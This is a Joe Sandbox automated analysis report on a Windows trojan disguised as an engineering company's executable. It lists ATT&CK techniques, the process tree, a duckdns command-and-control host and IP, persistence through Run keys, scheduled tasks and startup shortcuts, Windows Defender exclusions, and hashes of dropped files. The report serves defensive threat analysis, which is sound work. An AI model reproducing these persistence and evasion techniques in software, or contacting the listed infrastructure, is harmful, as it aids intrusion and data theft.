• Discovery: Security Software Discovery [121]; Process Discovery [1]; Virtualization/Sandbox Evasion [31]; Application Window Discovery [1]; File and Directory Discovery [1]; System Information Discovery [13]; Remote System Discovery; System Owner/User Discovery
• Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
• Collection: Input Capture [1]; Archive Collected Data [11]; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
• Command and Control: Encrypted Channel [1]; Non-Standard Port [1]; Non-Application Layer Protocol [1]; Application Layer Protocol [21]; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
• Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
• Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph (ID: 1545926)
Sample: SS Bottmac Engineers Pvt. L... (name truncated in the graph); Start date: 31/10/2024; Architecture: WINDOWS; Score: 100
Network node: kanrplest.duckdns.org (signature: Uses dynamic DNS services)
Top-level signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 18 other signatures

Process tree recovered from the graph:
• SS Bottmac Engineers Pvt. Ltd..exe (started)
  Dropped: C:\Users\user\AppData\Roaming\RTUZKYTc.exe (PE32); C:\Users\...\RTUZKYTc.exe:Zone.Identifier (ASCII); C:\Users\user\AppData\Local\...\tmp960E.tmp (XML); C:\...\SS Bottmac Engineers Pvt. Ltd..exe.log (ASCII)
  Signatures: Adds a directory exclusion to Windows Defender; Injects a PE file into a foreign processes
  • SS Bottmac Engineers Pvt. Ltd..exe (child, started)
    Network: kanrplest.duckdns.org, 104.223.35.76, ports 4068, 49764, 49789, ASN-QUADRANET-GLOBALUS, United States
    Dropped: C:\...\SS Bottmac Engineers Pvt. Ltd..exe (PE32)
    Signatures: Adds a directory exclusion to Windows Defender
    • powershell.exe (started; signature: Loading BitLocker PowerShell Module) > conhost.exe
    • powershell.exe (started) > conhost.exe
    • powershell.exe (started) > conhost.exe
  • powershell.exe (started; signature: Loading BitLocker PowerShell Module) > conhost.exe
  • powershell.exe (started) > conhost.exe
  • schtasks.exe (started) > conhost.exe
• RTUZKYTc.exe (started)
  Signatures: Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file
  • schtasks.exe (started) > conhost.exe
  • RTUZKYTc.exe (started)
• SS Bottmac Engineers Pvt. Ltd..exe (started)
  • schtasks.exe (started) > conhost.exe
  • 2 other processes
• SS Bottmac Engineers Pvt. Ltd..exe (started)
  • 3 other processes > conhost.exe

Source | Detection | Scanner | Label | Link
SS Bottmac Engineers Pvt. Ltd..exe | 39% | ReversingLabs | Win32.Trojan.Leonem |
SS Bottmac Engineers Pvt. Ltd..exe | 100% | Joe Sandbox ML | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\RTUZKYTc.exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe | 100% | Joe Sandbox ML | |
C:\Users\user\AppData\Roaming\RTUZKYTc.exe | 39% | ReversingLabs | Win32.Trojan.Leonem |
C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe | 39% | ReversingLabs | Win32.Trojan.Leonem |
              No Antivirus matches
              No Antivirus matches
Source | Detection | Scanner | Label | Link
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
http://crl.micro | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/soap/encoding/ | 0% | URL Reputation | safe |
https://aka.ms/pscore6lB | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/wsdl/ | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | 0% | URL Reputation | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
kanrplest.duckdns.org | 104.223.35.76 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
kanrplest.duckdns.org | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://nuget.org/NuGet.exe | powershell.exe, 0000000C.00000002.2139010974.000000000600C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2191476893.000000000608C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://crl.micro | powershell.exe, 0000000C.00000002.2130664829.00000000033AD000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/soap/encoding/ | powershell.exe, 0000000C.00000002.2131938852.00000000050F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2178385640.0000000005178000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://aka.ms/pscore6lB | powershell.exe, 0000000C.00000002.2131938852.0000000004FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2178385640.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2240731614.0000000004771000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/wsdl/ | powershell.exe, 0000000C.00000002.2131938852.00000000050F8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2178385640.0000000005178000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://tempuri.org/DataSet1.xsd | SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr | false | | unknown
https://contoso.com/ | powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 0000000C.00000002.2139010974.000000000600C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2191476893.000000000608C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/License | powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://contoso.com/Icon | powershell.exe, 00000014.00000002.2261845136.00000000057DB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SS Bottmac Engineers Pvt. Ltd..exe, 00000000.00000002.2073252953.00000000032B2000.00000004.00000800.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 00000009.00000002.4528212796.0000000003341000.00000004.00000800.00020000.00000000.sdmp, RTUZKYTc.exe, 0000000A.00000002.2150760883.0000000003182000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2131938852.0000000004FA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.2178385640.0000000005021000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.2240731614.0000000004771000.00000004.00000800.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 00000016.00000002.2388435834.0000000003161000.00000004.00000800.00020000.00000000.sdmp, SS Bottmac Engineers Pvt. Ltd..exe, 0000001B.00000002.2469960785.0000000003682000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | SS Bottmac Engineers Pvt. Ltd..exe, RTUZKYTc.exe.0.dr, SS Bottmac Engineers Pvt. Ltd..exe.9.dr | false | URL Reputation: safe | unknown
https://github.com/Pester/Pester | powershell.exe, 00000014.00000002.2240731614.00000000048C6000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.223.35.76 | kanrplest.duckdns.org | United States | 8100 | ASN-QUADRANET-GLOBALUS | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1545926
Start date and time: 2024-10-31 10:30:07 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 47s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 34
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: SS Bottmac Engineers Pvt. Ltd..exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@43/32@13/1
EGA Information:
• Successful, ratio: 72.7%
HCA Information:
• Successful, ratio: 99%
• Number of executed functions: 385
• Number of non-executed functions: 45
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target RTUZKYTc.exe, PID 7728 because it is empty
• Execution Graph export aborted for target SS Bottmac Engineers Pvt. Ltd..exe, PID 7196 because it is empty
• Execution Graph export aborted for target SS Bottmac Engineers Pvt. Ltd..exe, PID 7676 because it is empty
• Not all processes were analyzed; report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: SS Bottmac Engineers Pvt. Ltd..exe
Time      | Type            | Description
05:31:00  | API Interceptor | 6888574x Sleep call for process: SS Bottmac Engineers Pvt. Ltd..exe modified
05:31:03  | API Interceptor | 71x Sleep call for process: powershell.exe modified
05:31:06  | API Interceptor | 2x Sleep call for process: RTUZKYTc.exe modified
10:31:05  | Task Scheduler  | Run new task: RTUZKYTc path: C:\Users\user\AppData\Roaming\RTUZKYTc.exe
10:31:23  | Autostart       | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SS Bottmac Engineers Pvt. Ltd. C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe
10:31:31  | Autostart       | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SS Bottmac Engineers Pvt. Ltd. C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe
10:31:40  | Autostart       | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SS Bottmac Engineers Pvt. Ltd..lnk
Match          | Associated Sample Name / URL                        | Detection | Threat Name
104.223.35.76  | IMG465244247443 ORDER Opmagasinering.exe            | malicious | XWorm
               | SecuriteInfo.com.Win32.MalwareX-gen.23086.24319.exe | malicious | PureLog Stealer, XWorm
               | rSolicita____odeCota____o.exe                       | malicious | XWorm
No context
Match                   | Associated Sample Name / URL                                       | Detection | Threat Name              | Context
ASN-QUADRANET-GLOBALUS  | main.elf                                                           | malicious | Xmrig                    | 66.63.187.195
                        | Proforma Invoice347.doc                                            | malicious | Nanocore                 | 66.63.187.113
                        | S1qgnlqr1V.exe                                                     | malicious | Nanocore                 | 66.63.187.113
                        | Quotation_PMV-1060_AVR1_PMV_1513_AVR1_PMV_1514_AVR1_PMV_1515.exe   | malicious | GuLoader, StormKitty     | 204.44.127.85
                        | splarm5.elf                                                        | malicious | Unknown                  | 190.9.40.179
                        | Master.exe                                                         | malicious | CobaltStrike, Metasploit | 141.98.197.31
                        | setup_office.exe                                                   | malicious | CobaltStrike, Metasploit | 141.98.197.31
                        | 111.out.elf                                                        | malicious | Unknown                  | 141.98.197.31
                        | m68k.elf                                                           | malicious | Mirai                    | 45.199.228.213
                        | iQPxJrxxaj.exe                                                     | malicious | PikaBot                  | 104.129.55.104
                              No context
                              No context
                              Process:C:\Users\user\AppData\Roaming\RTUZKYTc.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                              Malicious:false
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                              Process:C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):1216
                              Entropy (8bit):5.34331486778365
                              Encrypted:false
                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                              Malicious:true
                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2232
                              Entropy (8bit):5.379633281639906
                              Encrypted:false
                              SSDEEP:48:NlWSU4xympjgs4RIoU99tK8NPZHUl7u1iMugeC/ZM0Uyus:NlLHxvCsIfA2KRHmOugw1s
                              MD5:0065122BB5759BA8A4BAC6ACDBEDC9DC
                              SHA1:353E9A4100CA43455810CD95CA78C5175F6F799F
                              SHA-256:214E4E0D00F3967A8F89D59A421B8556A61FEA2152BF5D730AEF5326779B24E0
                              SHA-512:131AA0A86C30FDBE14BCE5F104D69D133F646F213AB1AB37ECEDAAEE93BA07F6C705BCC9D50FBBCA184FC1EEE6A3DFD43D8F1B6EE45C631E0CD85D9BFD83AABB
                              Malicious:false
                              Preview:@...e.................................[..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                              Process:C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe
                              File Type:Generic INItialization configuration [WIN]
                              Category:dropped
                              Size (bytes):58
                              Entropy (8bit):3.598349098128234
                              Encrypted:false
                              SSDEEP:3:rRSFYJKXzovNsr42VjFYJKXzovX:EFYJKDoWr5FYJKDoP
                              MD5:5362ACB758D5B0134C33D457FCC002D9
                              SHA1:BC56DFFBE17C015DB6676CF56996E29DF426AB92
                              SHA-256:13229E0AD721D53BF9FB50FA66AE92C6C48F2ABB785F9E17A80E224E096028A4
                              SHA-512:3FB6DA9993FBFC1DC3204DC2529FB7D9C6FE4E6F06E6C8E2DC0BE05CD0E990ED2643359F26EC433087C1A54C8E1C87D02013413CE8F4E1A6D2F380BE0F5EB09B
                              Malicious:false
                              Preview:....### explorer ###..[WIN]r[WIN]....### explorer ###..r
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
Identical copies: 19 further dropped files with the same content and hashes (MD5 D17FE0A3F47BE24A6453E9EF58C94641), each written by C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Malicious: false. This one-line file is PowerShell's own probe for AppLocker / script-policy lockdown mode, written by every PowerShell host on startup; it is not an artifact of the sample.
                              Process:C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe
                              File Type:XML 1.0 document, ASCII text
                              Category:dropped
                              Size (bytes):1581
                              Entropy (8bit):5.1099289848386675
                              Encrypted:false
                              SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtWxvn:cgergYrFdOFzOzN33ODOiDdKrsuTav
                              MD5:AF0C00DEA3136F47ECD0634C9538B4C4
                              SHA1:FC8E0AC24790D0A383A39F6440C12DD2BEC93B7B
                              SHA-256:0AEC93A66EF83171D3D9DA10575FFE018B5E541FFDBB7DFA7C55E8A37A939E41
                              SHA-512:7264BE5C87E4B721FB309B43F7D38F548976EFFF4E5B9B4B7A0174402AC18ADB635A17713A4D8F9A6D2694A1E5E4900EC42C81C19F249874A8706755B1C791AE
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                              Process:C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe
                              File Type:XML 1.0 document, ASCII text
                              Category:dropped
                              Size (bytes):1581
                              Entropy (8bit):5.1099289848386675
                              Encrypted:false
                              SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtWxvn:cgergYrFdOFzOzN33ODOiDdKrsuTav
                              MD5:AF0C00DEA3136F47ECD0634C9538B4C4
                              SHA1:FC8E0AC24790D0A383A39F6440C12DD2BEC93B7B
                              SHA-256:0AEC93A66EF83171D3D9DA10575FFE018B5E541FFDBB7DFA7C55E8A37A939E41
                              SHA-512:7264BE5C87E4B721FB309B43F7D38F548976EFFF4E5B9B4B7A0174402AC18ADB635A17713A4D8F9A6D2694A1E5E4900EC42C81C19F249874A8706755B1C791AE
                              Malicious:true
                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                              Process:C:\Users\user\AppData\Roaming\RTUZKYTc.exe
                              File Type:XML 1.0 document, ASCII text
                              Category:dropped
                              Size (bytes):1581
                              Entropy (8bit):5.1099289848386675
                              Encrypted:false
                              SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtWxvn:cgergYrFdOFzOzN33ODOiDdKrsuTav
                              MD5:AF0C00DEA3136F47ECD0634C9538B4C4
                              SHA1:FC8E0AC24790D0A383A39F6440C12DD2BEC93B7B
                              SHA-256:0AEC93A66EF83171D3D9DA10575FFE018B5E541FFDBB7DFA7C55E8A37A939E41
                              SHA-512:7264BE5C87E4B721FB309B43F7D38F548976EFFF4E5B9B4B7A0174402AC18ADB635A17713A4D8F9A6D2694A1E5E4900EC42C81C19F249874A8706755B1C791AE
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                              Process:C:\Users\user\AppData\Roaming\SS Bottmac Engineers Pvt. Ltd..exe
                              File Type:XML 1.0 document, ASCII text
                              Category:dropped
                              Size (bytes):1581
                              Entropy (8bit):5.1099289848386675
                              Encrypted:false
                              SSDEEP:24:2di4+S2qhlZ1Muy1my3UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtWxvn:cgergYrFdOFzOzN33ODOiDdKrsuTav
                              MD5:AF0C00DEA3136F47ECD0634C9538B4C4
                              SHA1:FC8E0AC24790D0A383A39F6440C12DD2BEC93B7B
                              SHA-256:0AEC93A66EF83171D3D9DA10575FFE018B5E541FFDBB7DFA7C55E8A37A939E41
                              SHA-512:7264BE5C87E4B721FB309B43F7D38F548976EFFF4E5B9B4B7A0174402AC18ADB635A17713A4D8F9A6D2694A1E5E4900EC42C81C19F249874A8706755B1C791AE
                              Malicious:false
                              Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor
                              Process:C:\Users\user\Desktop\SS Bottmac Engineers Pvt. Ltd..exe
                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Thu Oct 31 08:31:24 2024, mtime=Thu Oct 31 08:31:25 2024, atime=Thu Oct 31 08:31:25 2024, length=575496, window=hide
                              Category:dropped
                              Size (bytes):882
                              Entropy (8bit):5.044289521357359
                              Encrypted:false
                              SSDEEP:12:8OG4ff88CGlsY//4LyQPplozK6LHAjAkeFHOpcc+LSS9pBmV:8QfE8hZi7Ppum/AkeTWqpBm
                              MD5:64D46B8CC371AF7F92D323E0A91119E4
                              SHA1:3338DB5C22FEBADCB4F2D32A1CE0E7CABCE3879F
                              SHA-256:C57727433577BC090FBFB8FCB2263768A27CE8784FE738BCB5164B2C411AA5D6
                              SHA-512:6E3FE19E62781D664124F32C6BD3104EA8906282557E70580F47B6B82C3F38E21BA0B694667CA52C9AA0457F88F484798101F6DFDDB72FC134E5B03663468E9A
                              Malicious:false
